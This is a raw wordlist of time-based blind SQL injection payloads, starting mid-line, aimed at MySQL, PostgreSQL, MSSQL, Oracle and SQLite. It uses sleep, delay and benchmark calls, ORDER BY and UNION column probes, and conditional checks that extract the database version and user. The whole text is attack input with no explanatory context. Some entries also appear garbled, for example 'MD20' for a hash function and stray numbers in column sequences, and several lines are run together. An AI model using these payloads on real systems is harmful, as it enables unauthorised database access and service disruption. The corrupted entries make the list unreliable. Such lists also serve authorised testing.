,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(20))A))
-1+or+1=((SELECT+1+FROM+(SELECT+SLEEP(20))A))(SELECT * FROM (SELECT(SLEEP(20)))YYYY)(SELECT * FROM (SELECT(SLEEP(20)))YYYY)#(SELECT * FROM (SELECT(SLEEP(20)))YYYY)--'+(select*from(select(sleep(20)))a)+'(select(0)from(select(sleep(20)))v)%2f'+(select(0)from(select(sleep(20)))v)+'"(select(0)from(select(sleep(20)))v)%2f*'+(select(0)from(select(sleep(20)))v)+'"+(select(0)from(select(sleep(20)))v)+"*%2f(select(0)from(select(sleep(20)))v)/*'+(select(0)from(select(sleep(20)))v)+'"+(select(0)from(select(sleep(20)))v)+"*/',''),/*test*/%26%26%09sLeEp(20)%09--+AND BLIND:1 and sleep 20--
0'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(20*1),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(10+10),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(21-1),0))XOR'Z
0'or(now()=sysdate()&&SLEEP(20))or'Zif(now()=sysdate(),sleep(20),0)/"XOR(if(now()=sysdate(),sleep(20),0))OR"/if(now()=sysdate(),sleep(20),0)/*'XOR(if(now()=sysdate(),sleep(20),0))OR'"XOR(if(now()=sysdate(),sleep(20),0))OR"*/if(now()=sysdate(),sleep(20),0)/'XOR(if(now()=sysdate(),sleep(20),0))OR'"XOR(if(now()=sysdate(),sleep(20),0) and 20=20)"/SLEEP(20)/*' or SLEEP(20) or '" or SLEEP(20) or "*/%2c(select%20*%20from%20(select(sleep(20)))a)
0'|(IF((now())LIKE(sysdate()),SLEEP(1),0))|'Z
1 AND (SELECT * FROM (SELECT(SLEEP(20)))YYYY) AND '%'='
1 AND (SELECT * FROM (SELECT(SLEEP(20)))ZmTo)
1 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND (1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)# 1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-1337
1 AND 1337=(SELECT 1337 FROM PG_SLEEP(20))
1 AND 1337=(SELECT 1337 FROM PG_SLEEP(20))-- 1337
1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),20)1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),20)-- 1337' AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),20) AND '1337'='1337') AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),20) AND ('1337'='1337) AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),20) AND (1337=1337
1 AND ELT(1337=1337,SLEEP(20))
1 AND ELT(1337=1337,SLEEP(20))# 1337
1 AND ELT(1337=1337,SLEEP(20))-- 1337
1 AnD SLEEP(20)
1 RLIKE SLEEP(20)
1 RLIKE SLEEP(20)# 1337
1 RLIKE SLEEP(20)-- 1337
1 SELECT SLEEP(20); #
1 SELECT pg_sleep(20);
1 WAITFOR DELAY '0:0:20'
1 WAITFOR DELAY '0:0:20'--
1 WAITFOR DELAY '0:0:20'-- 1337
1 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
1 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
1 WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
1 and sleep 20
1 and sleep(20)
1 and sleep(20)--
1 or benchmark(10000000,MD20(1))#
1 or pg_sleep(20)--
1 or sleep(20)#
1' AND 1337=(SELECT 1337 FROM PG_SLEEP(20)) AND '1337'='1337
1' WAITFOR DELAY '0:0:20' AND '1337'='1337
1'%2b(select*from(select(sleep(20)))a)%2b'
1') AND 1337=(SELECT 1337 FROM PG_SLEEP(20)) AND ('1337'='1337
1') WAITFOR DELAY '0:0:20' AND ('1337'='1337
1'XOR(if(now()=sysdate(),sleep(20),0))OR'
1) AND 1337=(SELECT 1337 FROM PG_SLEEP(20)) AND (1337=1337
1) WAITFOR DELAY '0:0:20' AND (1337=1337
1) or benchmark(10000000,MD20(1))#
1) or pg_sleep(20)--
1) or sleep(20)#
1)) or benchmark(10000000,MD20(1))#
1)) or pg_sleep(20)--
1)) or sleep(20)#
1-IF(MID(VERSION(),1,1) = '20', SLEEP(120), 0)
1`=`1` AND ELT(1337=1337,SLEEP(20)) AND `1`=`1
; IF (ASCII(lower(substring((USER),20,1)))<10) WAITFOR DELAY '00:00:20'--
; IF (ASCII(lower(substring((USER),3,1)))>1) WAITFOR DELAY '00:00:20'--
; IF (ASCII(lower(substring((USER),3,1)))>20) WAITFOR DELAY '00:00:20'--
; IF (LEN(USER)=1) WAITFOR DELAY '00:00:20'--
; IF SYSTEM_USER='sa' WAIT FOR DELAY '00:00:120'
; IF SYSTEM_USER='sa' WAIT FOR DELAY '00:00:20'
; WAIT FOR DELAY '00:00:120'
; WAIT FOR DELAY '00:00:20'
; WAITFOR DELAY '00:00:10';--
;SELECT SLEEP(20); #
;SELECT pg_sleep(20);
;WAITFOR DELAY '0:0:20'
;WAITFOR DELAY '0:0:20'--
;sleep 20
;sleep 20--
;sleep(20)
;sleep(20)--
;waitfor delay '0:0:20'--
AND (SELECT * FROM (SELECT(SLEEP(20)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(20)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(20)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(20)))nQIP)#
AND (SELECT * FROM (SELECT(SLEEP(20)))nQIP)--
AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)
AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(2000000000/2))))
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(2000000000/2))))
AND LIKE SLEEP(20)--
AnD SLEEP(20)
AnD SLEEP(20)#
AnD SLEEP(20)--
BEGIN DBMS_LOCK.SLEEP(120); END;
BENCHMARK(100000000, rand())
BENCHMARK:You can replace AND / OR' AND 1337=BENCHMARK(20000000,MD20(0x774c20341))--
IF(MID(VERSION(),1,1) = '1', SLEEP(20), 0)
IF(MID(VERSION(),1,1) = '2', SLEEP(20), 0)
IF(MID(VERSION(),1,1) = '3', SLEEP(20), 0)
IF(MID(VERSION(),1,1) = '4', SLEEP(20), 0)
IF(MID(VERSION(),1,1) = '5', SLEEP(20), 0)
IF(MID(VERSION(),1,1) = '6', SLEEP(20), 0)
IF(MID(VERSION(),1,1) = '7', SLEEP(20), 0)
IF(MID(VERSION(),1,1) = '8', SLEEP(20), 0)
OR (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
OR LIKE SLEEP(20)--
ORDER BY 1,SLEEP(20)-- -
ORDER BY 1,SLEEP(20)#
ORDER BY 1,SLEEP(20),3#
ORDER BY 1,SLEEP(20),3,4#
ORDER BY 1,SLEEP(20),3,4--
ORDER BY 1,SLEEP(20),3--
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),3-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),3,4-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,25-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,25#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,25,26-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,25,26#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,25,26,27-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,25,26,27#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,25,26,27,28-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,25,26,27,28#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,25,26,27,28-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,25,26,27-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,25,26-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18,19-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17,18-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16,17-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120,16-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14,120-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13,14-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12,13-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11,12-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10,11-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9,10-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8,9-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7,8-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6,7#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5,6-- -
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,5-- -
ORDER BY 1,SLEEP(20)--
ORDER BY SLEEP(20)-- -
ORDER BY SLEEP(20)#
ORDER BY SLEEP(20)--
RANDOMBLOB(1000000000/2)
RANDOMBLOB(2000000000/2)
SLEEP(120)
SLEEP(20)#
SLEEP(20)--
SLEEP(20)/*' or SLEEP(20) or '" or SLEEP(20) or "*/
SLEEP(20)="
SLEEP(20)='
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A'))--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20)--
UNION ALL SELECT SLEEP(20)--
UNION ALL SELECT USER(),SLEEP(20)--
UNION SELECT @@VERSION,SLEEP(20),"'3
UNION SELECT @@VERSION,SLEEP(20),"'3'"#
UNION SELECT @@VERSION,SLEEP(20),3
UNION SELECT @@VERSION,SLEEP(20),USER(),4
UNION SELECT @@VERSION,SLEEP(20),USER(),4#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13,14
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13,14#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13,14,120
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13,14,120#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13,14,120,16
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13,14,120,16#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13,14,120,16,17
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13,14,120,16,17#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13,14,120,16,17,18
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13,14,120,16,17,18#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13,14,120,16,17,18,19
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13,14,120,16,17,18,19#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),5,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220#
